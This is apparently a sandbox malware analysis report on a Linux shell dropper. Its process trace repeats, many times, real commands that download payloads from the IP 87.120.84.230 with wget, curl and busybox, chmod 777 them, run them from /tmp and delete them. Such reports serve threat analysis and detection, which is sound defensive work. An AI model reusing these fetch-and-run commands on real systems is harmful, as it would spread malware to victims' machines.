Malware Analysis Report

2025-05-28 20:52

Sample ID 241021-ce7sfstala
Target f542050a645c72e971d62a3493d03ae4.bin
SHA256 b81f5bd915e3f48dd35b352aab2a3c6188f31172496eb838d378a7f89eebd3cf
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b81f5bd915e3f48dd35b352aab2a3c6188f31172496eb838d378a7f89eebd3cf

Threat Level: Shows suspicious behavior

The file f542050a645c72e971d62a3493d03ae4.bin shows suspicious behavior. The process trace records a shell dropper: it first deletes its own copy (rm bins.sh), then for each of 14 payload names fetches http://87.120.84.230/bins/<name> with wget, curl -O and /bin/busybox wget in turn, runs chmod 777 on the result, executes it from /tmp and deletes it, and then makes a second pass over the same 14 names (28 cycles in total on the amd64 run). Note that the antivm and discovery signatures below are raised by /usr/bin/curl reading /proc/cpuinfo, /proc/self/auxv and /proc/sys/crypto/fips_enabled, not by the dropped payloads, so those two tags describe the system download tool rather than the sample.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 02:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:02

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

20s

Max time network

129s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

